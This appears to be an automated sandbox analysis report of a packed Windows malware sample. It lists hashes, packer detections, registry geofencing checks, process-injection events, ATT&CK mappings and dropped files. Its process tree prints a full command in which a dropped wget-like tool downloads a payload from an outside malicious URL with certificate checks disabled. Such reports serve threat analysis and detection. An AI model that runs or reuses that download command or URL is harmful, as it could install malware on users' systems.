68a246dc4a96ebf335e98db5a7c07e7e8b74596c7c28b18e2307937f8e7e2ab6

Analysis

max time kernel
134s
max time network
168s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
29-12-2023 23:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06d3932e8e686d0acd65440d6a39396d.exe
Size

587KB
MD5

06d3932e8e686d0acd65440d6a39396d
SHA1

7d89988d97cae5075be755add6be35bccd674c3a
SHA256

68a246dc4a96ebf335e98db5a7c07e7e8b74596c7c28b18e2307937f8e7e2ab6
SHA512

bee473db9a1b5675e1dcac8c19e041a3df30b4214c33e7d37463a6bdd64df918992ca5efbaf17a98ffc9323915274a8a4a0a5fee9386f600a3656822e60473e7
SSDEEP

12288:9oS+9ZYTx6X2EsOg5I6WfasJTV47T5l4hgagtNBNfwvV4HbgGM+h4XUg2:u9ZYF6PE5WfRTylNntr+vabgGmUg2

Score

7^/10

upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000200000001e7f2-69.dat	acprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	06d3932e8e686d0acd65440d6a39396d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	rgZu6fndN0dZR4.exe

Executes dropped EXE 8 IoCs

pid	Process
2096	rgZu6fndN0dZR4.exe
1280	31RqNrqe.exe
4604	txyRsNmiS.exe
2452	F8CF33AD986170E3D24561D4B8B8D76B.EXE
4800	C0CA437737654CA667038D6B2C1B5D1E.EXE
1984	C907D7A30E7D43AFD00202154480A33A.EXE
1804	C0CA437737654CA667038D6B2C1B5D1E.EXE
4384	C907D7A30E7D43AFD00202154480A33A.EXE

Loads dropped DLL 2 IoCs

pid	Process
1984	C907D7A30E7D43AFD00202154480A33A.EXE
4384	C907D7A30E7D43AFD00202154480A33A.EXE

UPX packed file 28 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2780-0-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/2780-1-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/2780-2-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/2780-4-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/memory/2780-5-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/files/0x000500000001e7e9-20.dat	upx
behavioral2/memory/2780-28-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/files/0x000400000001e7ed-30.dat	upx
behavioral2/memory/1280-37-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral2/memory/2096-49-0x0000000000400000-0x0000000000424000-memory.dmp	upx
behavioral2/files/0x000200000001e7f1-54.dat	upx
behavioral2/memory/2452-55-0x0000000000400000-0x00000000004C7000-memory.dmp	upx
behavioral2/memory/2452-58-0x0000000000400000-0x00000000004C7000-memory.dmp	upx
behavioral2/files/0x000200000001e7ef-60.dat	upx
behavioral2/memory/4800-61-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/4800-63-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/files/0x000200000001e7f0-66.dat	upx
behavioral2/memory/1984-67-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral2/files/0x000200000001e7f2-69.dat	upx
behavioral2/memory/1984-72-0x0000000061B40000-0x0000000061B6B000-memory.dmp	upx
behavioral2/memory/1984-73-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral2/memory/1804-77-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/1804-78-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/4384-82-0x0000000061B40000-0x0000000061B6B000-memory.dmp	upx
behavioral2/memory/4384-83-0x0000000000400000-0x000000000040F000-memory.dmp	upx
behavioral2/memory/4384-84-0x0000000061B40000-0x0000000061B6B000-memory.dmp	upx
behavioral2/memory/1280-93-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral2/memory/1280-95-0x0000000000400000-0x0000000000426000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 2096	2780	06d3932e8e686d0acd65440d6a39396d.exe	96
PID 2780 wrote to memory of 2096	2780	06d3932e8e686d0acd65440d6a39396d.exe	96
PID 2780 wrote to memory of 2096	2780	06d3932e8e686d0acd65440d6a39396d.exe	96
PID 2096 wrote to memory of 1280	2096	rgZu6fndN0dZR4.exe	97
PID 2096 wrote to memory of 1280	2096	rgZu6fndN0dZR4.exe	97
PID 2096 wrote to memory of 1280	2096	rgZu6fndN0dZR4.exe	97
PID 2096 wrote to memory of 4604	2096	rgZu6fndN0dZR4.exe	98
PID 2096 wrote to memory of 4604	2096	rgZu6fndN0dZR4.exe	98
PID 2096 wrote to memory of 4604	2096	rgZu6fndN0dZR4.exe	98
PID 1280 wrote to memory of 4304	1280	31RqNrqe.exe	99
PID 1280 wrote to memory of 4304	1280	31RqNrqe.exe	99
PID 1280 wrote to memory of 4304	1280	31RqNrqe.exe	99
PID 4304 wrote to memory of 2452	4304	cmd.exe	101
PID 4304 wrote to memory of 2452	4304	cmd.exe	101
PID 4304 wrote to memory of 2452	4304	cmd.exe	101
PID 4304 wrote to memory of 4800	4304	cmd.exe	102
PID 4304 wrote to memory of 4800	4304	cmd.exe	102
PID 4304 wrote to memory of 4800	4304	cmd.exe	102
PID 4304 wrote to memory of 1984	4304	cmd.exe	103
PID 4304 wrote to memory of 1984	4304	cmd.exe	103
PID 4304 wrote to memory of 1984	4304	cmd.exe	103
PID 4304 wrote to memory of 1804	4304	cmd.exe	104
PID 4304 wrote to memory of 1804	4304	cmd.exe	104
PID 4304 wrote to memory of 1804	4304	cmd.exe	104
PID 4304 wrote to memory of 4384	4304	cmd.exe	105
PID 4304 wrote to memory of 4384	4304	cmd.exe	105
PID 4304 wrote to memory of 4384	4304	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\06d3932e8e686d0acd65440d6a39396d.exe
"C:\Users\Admin\AppData\Local\Temp\06d3932e8e686d0acd65440d6a39396d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Users\Admin\AppData\Local\Temp\rgZu6fndN0dZR4.exe
  "C:\Users\Admin\AppData\Local\Temp\rgZu6fndN0dZR4.exe" r
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2096
- - C:\Users\Admin\AppData\Local\Temp\31RqNrqe.exe
    "C:\Users\Admin\AppData\Local\Temp\31RqNrqe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1280
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\a00464.bat" "C:\Users\Admin\AppData\Local\Temp\31RqNrqe.exe" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4304
    - - C:\Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE
        
        F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://bttracker.uk.to/affiliate/549683/adsvp.php
        5⤵
        Executes dropped EXE
        
        PID:2452
    - - C:\Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE
        
        C0CA437737654CA667038D6B2C1B5D1E.EXE BE97944D33AC498D00EAEFB0144C844A
        5⤵
        Executes dropped EXE
        
        PID:4800
    - - C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE
        
        C907D7A30E7D43AFD00202154480A33A.EXE -o "(?<=UrlFilename: )\S+$" F70130C44CDD00A372972E2323195E7A
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1984
    - - C:\Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE
        
        C0CA437737654CA667038D6B2C1B5D1E.EXE F8410FF3AF7B31560FCD4B6EF91C73DD
        5⤵
        Executes dropped EXE
        
        PID:1804
    - - C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE
        
        C907D7A30E7D43AFD00202154480A33A.EXE -o "(?<=`)[^']+(?=' saved \[\d+\]$)" F70130C44CDD00A372972E2323195E7A
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4384
- - C:\Users\Admin\AppData\Local\Temp\txyRsNmiS.exe
    "C:\Users\Admin\AppData\Local\Temp\txyRsNmiS.exe"
    3⤵
    - Executes dropped EXE
    PID:4604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\C0CA437737654CA667038D6B2C1B5D1E.EXE

Filesize
3KB

MD5
5049de410279b8a38ff2eaffa730d91b

SHA1
1333be17f4476eca119016c9af30f98a433fada7

SHA256
ef3a5a3302e157b540e4b87789c0df5b0045c359a32a51fc7982c7d1a43b0f5a

SHA512
30442de03cdce07d4d0929918913fe868e5b2808025a83294cd3fe7e48a0acd52c6aa7ec9e96ee46fb187fcc73b5744ebdf2af81782554f5215ff14602012c4f

Download Submit
C:\Users\Admin\AppData\Local\C907D7A30E7D43AFD00202154480A33A.EXE

Filesize
13KB

MD5
dd7864264dc80ca797e13ea4ab59d77d

SHA1
50f6e8d352403daad08bd64cfb6094dc9cf01f7c

SHA256
194c8904cd7ee5e6baa2360f8390d05644a24abb6056c9a3d3996f65bf86e268

SHA512
6080e6116423c9a758ff3c819b3193c2f2bd42d4a20ceb577c9a0cc641f7023a18ebbb842d23155cbb7999e6f12c224b03eab850011987a5e6bd3cda6ac17882

Download Submit
C:\Users\Admin\AppData\Local\D6C4EAF1006C3841FE4E9E271D32129E.BAT

Filesize
74B

MD5
8c02566de6078f7db8d837da24bc8af6

SHA1
6bccaca0b9c3ce68a9dc19ad326b1333f170857a

SHA256
5bdd197337aea22c48810b1ea3f103fcb067577c8146f65a2ae05c50d8b760b7

SHA512
7728c6ddc6f481a5e9128eccee5ea2b16b5f6e65ce248f8e28650ebd982a1df2ebf170407bb716b1934456df9e78c6b60e9cb0df3807387f6cf2a780ecf6456a

Download Submit
C:\Users\Admin\AppData\Local\F70130C44CDD00A372972E2323195E7A

Filesize
209B

MD5
5d324d643c08a77ce2e5566d95a29349

SHA1
f78d11c2c6974601ed680a1a0898fc33a38218f7

SHA256
bb78cce711efbd2b933859e6d8a935fd73d9685321472c0fa6cdf73e3c4a2ae7

SHA512
8d57d56cdedcff15d598e15b6b5ee2d79f5c4e5f6f5d1e92d8d8bd8219c868778720b0d398f88769e9660fa17a9b6af4b3ee878beb7f62de742b3fd2ac28ca22

Download Submit
C:\Users\Admin\AppData\Local\F8CF33AD986170E3D24561D4B8B8D76B.EXE

Filesize
287KB

MD5
304646283a3416a97278aa93a779c64f

SHA1
85601dd261f7eff2056052e741990f242676cc17

SHA256
16f11764f77cc56b7bbb10941e78ee15280d0425b4bbd75bfdef1049e14c767a

SHA512
42c58daddb1209887b2f4a0f1c8396fe4942c66132271193cdde979edf1019781ec0f13ffdf60dccf6c211887931487e6f2c84765e5728f3451ebe93e69c2794

Download Submit
C:\Users\Admin\AppData\Local\Temp\31RqNrqe.exe

Filesize
397KB

MD5
bf6876a778d85a01d3e8487d879eb886

SHA1
d8901e46b990d780ee26d0e1142631682c2a6308

SHA256
83d8da7bc600627a1352755dde8d72b6761565526405041f3b9102f2c3af943d

SHA512
14c87b4559a426bfe5dbc9fcdf294ed36b5b9172bc4b700c3cc326bb38b9725d8b26bfb4bcd10e4085b1af37998ccb9daaf42504ed2f16d8300253b0abb2a0bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\HWAbIsgs.exe

Filesize
142KB

MD5
7c09916ffd7d4ef6dd5e91d294e6a162

SHA1
b488168523dbc61eb1e648dc9c3b76197ae5c2e3

SHA256
1d7c23b491d86cc1ed839547e4f194662f7344abb9aa5833ed0b9ec206e81ef0

SHA512
d58a4c0fe4ee8193e683179f0ab369e0b1e1cbb8e3af52066c19010dbdb4470af5575839f425dd709cdfc9d1bf22ae8aa27e01326e999f57c52d3fd6885ea8aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\rgZu6fndN0dZR4.exe

Filesize
587KB

MD5
06d3932e8e686d0acd65440d6a39396d

SHA1
7d89988d97cae5075be755add6be35bccd674c3a

SHA256
68a246dc4a96ebf335e98db5a7c07e7e8b74596c7c28b18e2307937f8e7e2ab6

SHA512
bee473db9a1b5675e1dcac8c19e041a3df30b4214c33e7d37463a6bdd64df918992ca5efbaf17a98ffc9323915274a8a4a0a5fee9386f600a3656822e60473e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\txyRsNmiS.exe

Filesize
7KB

MD5
714c52382baec8c2de4aaf3074d5db7c

SHA1
3f122fe69e3e070244d7443114268a72add3fd7e

SHA256
7ca1abeeceb75e3c1d3a4d9b5e4f8ed5c431d6f2103d89e24f1a7b26bebe19b4

SHA512
1237ba312b1acc2d066d9f25efd13bcea92d2659946c4e8c2d5a0acc77e5c98ef8516b391995a1b725d81ec7d515c7a926ffea4dc8aff710768794d96757fcac

Download Submit
C:\Users\Admin\AppData\Local\pcre3.dll

Filesize
50KB

MD5
534542c78dbf73c3c344a39cf0895bba

SHA1
1715bcffd007942396e6054ffe10865038c3ae07

SHA256
a0eb9604b6fea53c0ad8e832ab88266cff38f747e583ef1c709eed7ea694e858

SHA512
02a7f2f96227def3e7fad2746c8b459db91922a76876344e0865b652054eda9f25874ed7771fecfb8228350b07748941ea2ceb76ed469a2611376cb966d50a8b

Download Submit
C:\Windows\Temp\a00464.bat

Filesize
1KB

MD5
5f219147645d6ead321d01dcfce76a4d

SHA1
9f4cc60c382ecd741077cfce2ecf0a4a7a5b03fc

SHA256
fb74fbc692f6c536076f27dbe7291cc2a545d3bf5ebf5f368d77e29779fb7c89

SHA512
ed65797bb3fdb08304a3be14e9384092c82d9d05fb7b0ca5275cdff919aea093fc515789fec17fc3440f28981701a29955824bc189a746124daaf70bd09bcb68

Download Submit
memory/1280-37-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1280-93-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1280-95-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/1804-77-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1804-78-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/1984-73-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1984-67-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1984-72-0x0000000061B40000-0x0000000061B6B000-memory.dmp

Filesize
172KB

Download
memory/2096-49-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2452-55-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/2452-58-0x0000000000400000-0x00000000004C7000-memory.dmp

Filesize
796KB

Download
memory/2780-1-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2780-2-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2780-4-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2780-0-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2780-28-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2780-5-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4384-83-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/4384-82-0x0000000061B40000-0x0000000061B6B000-memory.dmp

Filesize
172KB

Download
memory/4384-84-0x0000000061B40000-0x0000000061B6B000-memory.dmp

Filesize
172KB

Download
memory/4604-51-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4800-61-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4800-63-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download